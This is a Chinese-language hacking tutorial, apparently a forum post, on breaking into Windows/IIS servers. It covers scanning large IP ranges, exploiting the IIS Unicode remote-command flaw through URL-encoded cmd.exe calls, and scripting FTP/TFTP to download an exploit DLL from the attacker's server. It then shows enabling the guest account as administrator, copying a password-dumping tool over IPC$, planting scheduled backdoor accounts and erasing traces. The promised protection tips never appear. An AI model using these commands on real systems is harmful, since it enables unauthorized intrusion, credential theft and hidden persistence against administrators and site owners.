系统入侵的一些方法和个人电脑防护技巧

先介绍一些系统入侵的一些常用方法：
先用流光(在iv FOR 2000/nt/xp的版本下)
一般我都是用SQL扫描(现在的流光都有IIS/PRONTPAGE扫描了，那就用这个）,然后利用的是iis远程执行命令漏洞，这个漏洞你应该知道一般有这个漏洞就有U漏洞，但是有U漏洞不一定有这个漏洞，所以我一般都扫个2-3万台
（网段）比如111.111.1.1-111.111.100.255
然后就去干别的，运气再不好，也有个好多台。
然后呢？我的手法是这样的
在IIS远程执行命令漏洞下（这个漏洞流光可以连接，其实就是U漏洞的各种类型，也就说你扫到U漏洞了用我以下写的手法一样非常容易入侵一台机器：），打入
copy c:winntsystem32cmd.exe c:inetpubscripts reasure.exe（如果是U漏洞在IE上打入:..../scripts/cmd.exe?/c+copy c:winntsystem32cmd.exe c:inetpubscripts reasure.exe)
其实在IIS远程执行命令漏洞下我们一般能用到的DOS命令（常用的）
是set查看他的网站结构，dir查看上传情况(记的常用dir c:xxx/s这个命令）
（此时可以在IE上打入ip/scripts/treasure.exe?/c+set,很有成就感是吗？）
虽然很多时候用SET就能看到网站的WEB目录但是更多的时候还是要用到这个命令
PATH_TRANSLATED=c:inetpubwwwroot
这个就是SET后的结果中的一句话
这个就是网站的WEB目录，那如果没这句话呢？没关系用DIR C:XXX/S这个命令啊
网站上随便找张图点右键，看到图的名字了吧呵呵替换XXX呵呵：）如果C盘下没有？
呵呵试到F盘：）肯定会有的哈哈
SET还可以查看到很多东东呢：）好好去实验吧，比如SCRIPTS目录，我还碰到过
SCRIPTS目录是c:progra~1....masca什么的呢：）这个你多实验肯定会知道的
接着呢我比较喜欢在IE上做事，其实在IIS远程命令执行漏洞上利用是一样的
ip/scripts/treasure.exe?/c+
这里你该明白了，我们权限很小，一般只能在这里用FTP或者TFTP上传：）
tftp的命令为
ip/scripts/treasure.exe?/c+tftp+ip+get+idq.dll+c:inetpubscriptsidq.dll
FTP的命令为
ip/scripts/treasure.exe?/c+echo+open+free.tsee.net>bbs.txt (你的FTP站点，在DOS下用FTP命令你就明白我所写了语句了）
ip/scripts/treasure.exe?/c+echo+treasure>>bbs.txt(ftp用户名)
ip/scripts/treasure.exe?/c+echo+123456>>bbs.txt(ftp密码)
ip/scripts/treasure.exe?/c+echo+get+idq.dll>>bbs.txt(idq.dll利用044漏洞入侵的，呵呵直接运行IDQ。DLL亦可以得到个ADMINISTRATOR用户和密码,iisuser,密码是abcd1234.)
直接运行的命令为ip/scripts/treasure.exe?/c+c:inetpubscriptsidq.dll(直接运行其他程序也是一样的用法，聪明的人应该现在就看出来了用的全是DOS命令）
ip/scripts/treasure.exe?/c+echo+bye>>bbs.txt
ip/scripts/treasure.exe?/c+ftp+-s:bbs.txt(ftp命令的高级使用了吧呵呵）
注意>是完全替换就是说BBS。TXT原来是存在的用>写就用现在的语句替换了，>>是写第二行第三行，
依次类推
这里要注意的是bbs.txt最后一定要删除，这里留下了你的FTP站点名字和你的用户名和密码
如果你下次还想用的话呵呵最好删除了（给个建议用台肉鸡开个FTP自己建立用户名和密码）
那样最方便了：）用肉鸡做事
然后呢就好办了
ispc ip/scripts/idq.dll
这里要补充的是，既然我们扫的是SQL出来的是IIS漏洞，当然能利用IDQ。DLL了，
其实有时候你扫到弱IPC密码和用户，他没开HTTP或者没用IIS那样的话呵呵，IDQ。DLL用不上了
我们只能上传些木马类的了。
这个是很好的后门，我最喜欢用这个了
别忘记连接后要按三次回车算一次的。
接着一般以我的手法是激活guest
net user guest /active:yes
net user guest 123456
net localgroup administrators guest /add
然后呢用ipc连接传个showpass到他的system32目录下呵呵肯定用的上的
net use \ipipc$ "800214520" /user:"guest"
copy showpass.exe \ipadmin$system32showpass.exe
net use \ipipc$ /delete(呵呵习惯要好)
这里要说明的是有兴趣的朋友亦可以上传IRC木马和csrss.exe（简短说明: 本软件可以在Nt4.0/Win2000的系统上面添加Administrators权限账号，由于采用时间添加方式，以任务方式添加账号，在中午12点整时自动添加账号，13点时删除账号，18点时添加账号，19点时删除账号，23点时添加账号，0点删除账号，由于以上几个时间段都是网管最容易忽视的时间，网管根本不会想到你会拥有Administrators权限
账号，从而使得你的劳动结果不会被破坏，:)

IRC木马不介绍的原因是太可怕，亦是我认为唯一算的上是好木马
说到开后门了
其实在上步的时候有兴趣的朋友可以上传ASP后门（不推荐觉的权限不够大）
这里我们用的是remotenc
remotenc没有日志记录（爽吗？）呵呵
remotenc对付administrator密码为空的时候输入""（嘿嘿）
remotenc的说明呵呵详细吧
RemoteNC